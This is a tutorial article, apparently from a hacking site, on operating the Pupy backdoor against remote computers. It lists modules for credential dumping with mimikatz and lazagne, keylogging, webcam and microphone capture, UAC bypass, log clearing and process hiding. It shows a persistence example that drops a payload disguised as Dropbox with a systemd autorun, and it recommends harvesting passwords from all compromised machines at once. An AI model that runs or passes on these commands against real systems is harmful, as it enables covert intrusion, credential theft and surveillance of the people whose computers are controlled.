How to control computers via backdoor

This article is the next part of the Pupy guide. The first two parts:

How to manage sessions

The sessions command performs tasks related to session management:

  • display a list of connected remote computers
  • selecting a session to send a command to a computer
  • disconnect from one or all computers at once

Usage:

sessions [-h] [-i ] [-g] [-k ] [-K] [-d ] [-D]

Optional arguments:

  -h, --help            show this help message and exit
  -i <filter>, --interact <filter>
                        change the default --filter value for other commands
  -g, --global-reset    reset --interact to the default global behavior
  -k <id>               Kill the selected session
  -K                    Kill all sessions
  -d <id>               Drop the connection (abruptly close the socket)
  -D                    Drop all connections

By default, all the commands that you enter to run on remote systems (launching modules) pupy executes immediately on all connected clients. Thanks to this, you can, for example, run mimikatz on all connected clients with one command and collect passwords everywhere at once.

To display the list of sessions run the command:

sessions

Pupy commands to run on a remote computer

In fact, this is not called commands, but modules, because, in fact, on remote computers you can execute any commands that support these systems.

As for the modules, they contain some frequently used commands, as well as combined actions, including using third-party tools (for example, to extract all passwords).

So let's start with an overview of all modules.

CATEGORY  NAME               HELP                                                                                                                           
---------------------------------------------------------------------------------------------------------------
admin     shares             List Local And Remote Shared Folder And Permission
admin     ls                 List System Files
admin     wmic               Query Wmi Using Wql
admin     psh                Load/Execute Powershell Scripts
admin     ssh                Ssh Client
admin     rfs                Mount Remote Fs As Fuse Fs To Mountpoint
admin     smbspider          Walk Through A Smb Directory And Recursively Search A String Into Files
admin     reg                Search/List/Get/Set/Delete Registry Keys/Values
admin     shell_exec         Execute Shell Commands On A Remote System
admin     logs               Show Logs (Or Try To Search Something)
admin     alive              Request To Send Keepalive Packets On Rpyc Level
admin     rdesktop           Start A Remote Desktop Session Using A Browser Websocket Client
admin     cp                 Copy File Or Directory
admin     interactive_shell  Open An Interactive Command Shell With A Nice Tty
admin     rm                 Remove A File Or A Directory
admin     smb                Copy Files Via Smb Protocol
admin     hibernate          Close Session During X Hours
admin     netstat            List Terminal Sessions
admin     drives             List Valid Drives In The System
admin     become             Become User
admin     sshell             Interactive Ssh Shell
admin     last               List Terminal Sessions
admin     rdp                Enable / Disable Rdp Connection Or Check For Valid Credentials On A Remote Host
admin     w                  List Terminal Sessions
admin     getdomain          Get Primary Domain Controller
admin     cd                 Change Directory
admin     date               Get Current Date
admin     pexec              Execute Shell Commands Non-Interactively On A Remote System In Background Using Popen
admin     ps                 List Processes
admin     zip                Zip / Unzip File Or Directory
admin     mkdir              Create An Empty Directory
admin     dns                Retrieve Domain Name From Ip And Vice Versa
admin     clear_logs         Clear Event Logs
admin     psexec             Launch Remote Commands Using Smbexec Or Wmiexec
admin     pyexec             Execute Python Code On A Remote System
admin     beroot             Check For Privilege Escalation Path
admin     cat                Show Contents Of A File
admin     pyshell            Open An Interactive Python Shell On The Remote Client
admin     mv                 Move File Or Directory
admin     display            Set Display Variable
admin     ip                 List Interfaces
admin     sudo_alias         Write An Alias For Sudo To Retrieve User Password
admin     igd                Upnp Igd Client
admin     stat               Show A Bit More Info About File Path. Acls/Caps/Owner For Now
admin     http               Trivial Get/Post Requests Via Http Protocol
admin     x509               Fetch Certificate From Server
admin     getppid            List Parent Process Information
admin     getpid             List Process Information
admin     services           List Services
admin     getuid             Get Username
admin     pwd                Get Current Working Dir
creds     loot_memory        Crawl Processes Memory And Look For Cleartext Credentials
creds     creddump           Download The Hives From A Remote Windows System And Dump Creds
creds     lazagne            Retrieve Passwords Stored On The Target
creds     mimipy             Run Mimipy To Retrieve Credentials From Memory
creds     memstrings         Dump Printable Strings From Process Memory For Futher Analysis
exploit   mimishell          Execute Mimikatz From Memory (Interactive)
exploit   mimikatz           Execute Mimikatz From Memory (Non-Interactive)
exploit   exploit_suggester  Exploit Suggester
exploit   shellcode_exec     Executes The Supplied Shellcode On A Client
exploit   impersonate        List/Impersonate Process Tokens
gather    keylogger          A Keylogger To Monitor All Keyboards Interaction Including The Clipboard :-)
gather    hashmon            Try To Find Clear Text Passwords In Memory
gather    get_info           Get Some Informations About One Or Multiple Clients
gather    contacts           To Get Contacts
gather    isearch            Use Windows Search Index To Search For Data
gather    search             Walk Through A Directory And Recursively Search A String Into Files
gather    check_vm           Check If Running On Virtual Machine
gather    outlook            Interact With Outlook Session Of The Targeted User
gather    record_mic         Record Sound With The Microphone !
gather    pywerview          Rewriting Of Some Powerview'S Functionalities In Python
gather    apps               To Interact Manage Applications
gather    call               To Get Call Details
gather    gpstracker         To Interact With Gps
gather    mouselogger        Log Mouse Clicks And Take Screenshots Of Areas Around It
gather    powerview          Execute Powerview Commands
gather    get_hwuuid         Try To Get Uuid (Dmi) Or Machine-Id (Dbus/Linux)
gather    webcamsnap         Take A Webcam Snap
gather    usniper            Globally Capture String Or Register During Execution At Specified
gather    cloudinfo          Retrieve Ec2/Digitalocean Metadata
gather    users              Get Interactive Users
gather    screenshot         Take A Screenshot
gather    ttyrec             Globally Capture Intput/Output To Tty. Compatible With Kernels
general   exit               Exit The Client On The Other Side
general   process_kill       Kill A Process
manage    upload             Upload A File/Directory To A Remote System
manage    edit               Edit Remote File Locally (Download->Edit->Upload)
manage    hide_process       Edit Current Process Argv & Env Not To Look Suspicious
manage    download           Download A File/Directory From A Remote System
manage    getprivs           Manage Current Process Privileges
manage    tasks              Get Info About Registered Background Tasks
manage    memory_exec        Execute A Executable From Memory
manage    lock_screen        Lock The Session
manage    duplicate          Duplicate The Current Pupy Payload By Executing It From Memory
manage    load_package       Load A Python Package Onto A Remote Client. Packages Files Must Be Placed In One Of The Pupy/Packages/<Os>/<Arch>/ Repository
manage    migrate            Migrate Pupy Into Another Process Using Reflective Dll Injection
manage    write              Write Short String To File
manage    env                List/Get/Set/Unset Client Environment Variables
manage    persistence        Enable / Disable Persistence
network   port_scan          Run A Tcp Port Scan
network   forward            Local/Remote Port Forwarding And Socks Proxy
network   tcpdump            Module To Reproduce Some Of The Classic Tcpdump Tool Functions
privesc   getsystem          Try To Get Nt Authority System Privileges
privesc   bypassuac          Be Carefull, Most Of Bypass Methods Are Detected By Av...
privesc   inveigh            Execute Inveigh Commands
privesc   privesc_checker    Linux Privilege Escalation Scripts
troll     text_to_speach     Use Android Text To Speach To Say Something
troll     vibrate            Activate The Phone/Tablet Vibrator
troll     msgbox             Pop Up A Custom Message Box

To run the command, you need to use the row that is in the ‘NAME’ column.

For example, to display a list of disks on all systems, run the command:

drives

To get help on a module, enter its name with the -h option. For example, I want to get help for the persistence module (enabling and disabling pinning):

persistence -h

Usage:

persistence [-h] [-s] [-p PAYLOAD] [-n NAME] [-m METHOD] [-l]
                   [--remove]

Optional arguments:

  -h, --help    show this help message and exit
  -s, --shared  prefer shared object (linux only)
  -p PAYLOAD    remote path or cmd to execute at login (windows only)
  -n NAME       custom name to use (windows only)
  -m METHOD     should be an ID, get the list (-l) scanning which methods are
                possible (windows only)
  -l            list all possible techniques for this host (windows only)
  --remove      remove persistence

An example of creating a backdoor on a remote system that will start when the computer starts:

-------------------------------------------------------------------------------------------------------------------------------------------
>>                                  PupyClient(id=2, user=mial, hostname=HackWare, platform=Linux)                                       <<
-------------------------------------------------------------------------------------------------------------------------------------------
 
{ Configuration }
KEY            VALUE                              
--------------------------------------------------
launcher       connect                            
launcher_args  --host 192.168.1.53:43210 -t http  
cid            3263277090                         
 
[+] Required credentials (found)
  + SSL_BIND_CERT
  + SIMPLE_RSA_PRIV_KEY
  + SIMPLE_RSA_PUB_KEY
[+] Generating the payload with the current config from pupyx64.lin - size=3713536
[+] Dropped: /home/mial/.dropbox-dist/dropboxc Method: Systemd Config: /home/mial/.config/systemd/user/dbus.service.d/hgzenu.conf

This entry means that the configuration file for autorun is saved along the /home/mial/.config/systemd/user/dbus.service.d/hgzenu.conf path, and the executable itself is stored in /home/mial/.dropbox-dist/dropboxc.

Some more examples.

To view information about network connections on remote systems:

netstat

To extract all passwords:

lazagne

Or:

mimikatz

Keylogger:

keylogger

Getting information about systems:

get_info

To get screenshots of desktops of remote computers:

screenshot

Execution of commands only on certain remote systems

You can switch between sessions, for example, to switch to the first session so that the commands entered are executed only on it:

sessions -i 1

It is not necessary to specify the session number – various filters are supported, thanks to which you can select one or several systems at once. For example, to interact only with all Windows 7:

sessions -i 'platform:Windows release:7'

Filtering by various parameters is supported, you can see them all by running the command:

get_info

Use autocompletion!

When entering commands, press the TAB key to complete the names of commands and options.

Escape your arguments

Each command in the pupy shell uses unix-like escape syntax. If you need a space in one of your arguments, you need to put your argument between the quotes:

shell_exec 'tasklist /V'

If you send the path to Windows, you need to escape the back slash with another second back slash, or put everything in quotes:

download 'C:\Windows\System32\cmd.exe'

Or:

download C:\\Windows\\System32\\cmd.exe

Create aliases

To improve productivity, you can specify aliases of modules in the pupy.conf file. If you define an alias as follows:

shell=interactive_shell

then start the command

shell

will be equivalent to running the command:

interactive_shell

An example of creating an alias for adding a command to kill the client process pupy with signal 9:

killme = pyexec -c 'import os;os.kill(os.getpid(),9)'

Jobs

Jobs are commands running in the background. Some modules, such as socks5proxy or portfwd, automatically start jobs, but all modules can be started as jobs if you use the --bg argument:

run --bg shell_exec 'tasklist /V'
[%] job < shell_exec ['tasklist /V'] > started in background !

Usage:

jobs [-h] [-k  | -K ] [-l] [-p ]

Optional arguments:

  -h, --help            show this help message and exit
  -k <job_id>, --kill <job_id>
                        print the job current output before killing it
  -K <job_id>, --kill-no-output <job_id>
                        kill job without printing output
  -l, --list            list jobs
  -p <job_id>, --print-output <job_id>
                        print a job output

The --bg switch is usually used when you want to execute a long command/module and you want the shell to remain functional during its operation.

The output of the jobs can be obtained at any time using the command

jobs -p

The jobs command can also display a list of jobs and stop jobs.

Normal jobs can be installed in your Linux/Unix desktop environment by running your pupysh.py script inside the Screen utility. You can then configure cronjobs to run the command at any intervals you require. Replace 1674 with your screen session ID. The echo command in this example essentially emulates pressing the Enter key:

screen -S 1674 -X stuff 'this is an example command'$(echo -ne '\015')

Run command

This command is needed to run modules, but you can skip it if you are not going to use additional features, such as executing a command in the background, saving results to a file and/or execute only for certain clients.

Usage:

run [-h] [-1] [-o OUTPUT] [-f ] [-b] <module> ...

Options:

positional arguments:
  <module>              module
  <arguments>           module arguments

optional arguments:
  -h, --help            show this help message and exit
  -1, --once            Unload new deps after usage
  -o OUTPUT, --output OUTPUT
                        save command output to file.%t - timestamp, %h - host,
                        %m - mac, %c - client shortname, %M - module name, %p
                        - platform, %u - user, %a - ip address
  -f <client filter>, --filter <client filter>
                        filter to a subset of all clients. All fields
                        available in the "info" module can be used. example:
                        run get_info -f 'platform:win release:7 os_arch:64'
  -b, --background      run in background

ImportError Error: No module named minikerberos.asn1_structs

When starting the module

lazagne

The following messages appear:

2019-05-16 06:08:09,404| Compilation error: expected an indented block line:        for mod in self.lsass_task.get_load_modules():
[!] Load pypykatz.commons.kerberosticket failed: Exception: No module named minikerberos.asn1_structs
[!] Error loading package pypykatz.commons.kerberosticket (pypykatz/commons/kerberosticket.pyo pkg=False) : No module named minikerberos.asn1_structs Traceback (most recent call last):
ImportError: No module named minikerberos.asn1_structs
[!] Load pypykatz.lsadecryptor.packages.kerberos.decryptor failed: Exception: No module named minikerberos.asn1_structs
[!] Error loading package pypykatz.lsadecryptor.packages.kerberos.decryptor (pypykatz/lsadecryptor/packages/kerberos/decryptor.pyo pkg=False) : No module named minikerberos.asn1_structs Traceback (most recent call last):
ImportError: No module named minikerberos.asn1_structs

Despite these messages, the module works properly and retrieves passwords from remote systems. Explanation from the author here: https://github.com/n1nj4sec/pupy/issues/750

Recommended for you:

Leave a Reply

Your email address will not be published. Required fields are marked *